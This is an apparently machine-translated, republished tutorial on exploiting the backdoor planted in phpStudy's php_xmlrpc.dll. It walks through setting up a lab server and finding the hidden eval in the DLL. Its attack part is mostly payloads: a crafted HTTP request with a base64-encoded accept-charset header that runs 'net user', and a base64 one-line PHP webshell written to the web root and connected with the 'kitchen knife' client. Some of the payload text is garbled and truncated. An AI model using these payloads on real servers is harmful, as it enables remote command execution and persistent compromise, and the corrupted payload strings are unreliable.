Shulou(Shulou.com)05/31 Report--

How to use the phpstudy backdoor loophole, in view of this problem, this article introduces the corresponding analysis and answer in detail, hoping to help more partners who want to solve this problem to find a more simple and easy way.

Phpstudy software is a free PHP debugging environment program integration package, through the integration of Apache, PHP, MySQL, phpMyAdmin, ZendOptimizer software one-time installation, without configuration can be installed directly, with PHP environment debugging and PHP development functions, there are nearly millions of PHP language learners, developers users. But there is a backdoor vulnerability, which can be directly getshell.

The version of the vulnerability exists: phpStudy2016php\ php-5.2.17\ ext\ php_xmlrpc.dllphp\ php-5.4.45\ ext\ php_xmlrpc.dllphpStudy2018PHPTutorial\ php\ php-5.2.17\ ext\ php_xmlrpc.dllPHPTutorial\ php\ php-5.4.45\ ext\ php_xmlrpc.dll

Preparation: server: 192.168.29.135 (Windows server 2008 SP2) phpStudy2016 (php-5.4.45+Apache)

I. build a vulnerability environment

1. Download phpStudy2016 version of phpstudy and switch to php-5.4.45+Apache version 2. 0 after startup. Check the IP address of the server 3. If you directly access http://192.168.29.135/, you can get the following interface (the following interface is a self-configured index.php interface, which can be configured according to the situation)

Two. causes of loopholes

1. Looking at the file C:\ phpStudy\ php\ php-5.4.45\ ext\ php_xmlrpc.dll (this is my installation path, check the installation path based on the actual installation), Ctrl+F looks for the keyword "@ evel" and finds "@ eval (% s (% s'));", which is also the cause of the vulnerability.

III. Loophole recurrence

1. Visit URL: http://192.168.29.135/, grab the packet, and send it to repeater module 2. 0. Add Accept-Encoding and accept-charset parameters Note: if you don't have the parameter Accept-Encoding, you need to add it manually, and notice that there is a comma between "gzip" and "deflate" and there is no space in between. You need to manually add: accept-charset: the base64 code echo system ("net user"); that executes the command

ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7-GET / HTTP/1.1Host: 192.168.29.135User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7Connection: closeUpgrade-Insecure-Requests: 1Cache-Control: max-age=0-

The execution result is: 3. Construct a sentence Trojan to write to the web path:

Fputs (fopen ('C:\ phpStudy\ WWW\ xx.php','w'),')

4. Encrypt the constructed statement with base64 (delete the left parenthesis in the encryption below) ZnB1dHMoZm (9wZW4oJ0M6XHBocFN0dWR5XFdXV1x4eC5waHAnLCd3JyksJzwhand cGhwIEBldFsKCRfUE9TVFsxXSkandPicpOwhammer = modify the parameter value of accept-charset, write a sentence to Trojan horse 5. Check whether the server writes the file to 6. 0. Use kitchen knife for connection operation, URL: http://192.168.29.135/xx.php, password is 1 original text link

This is the end of the answer to the question on how to use the phpstudy backdoor vulnerability. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel for more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.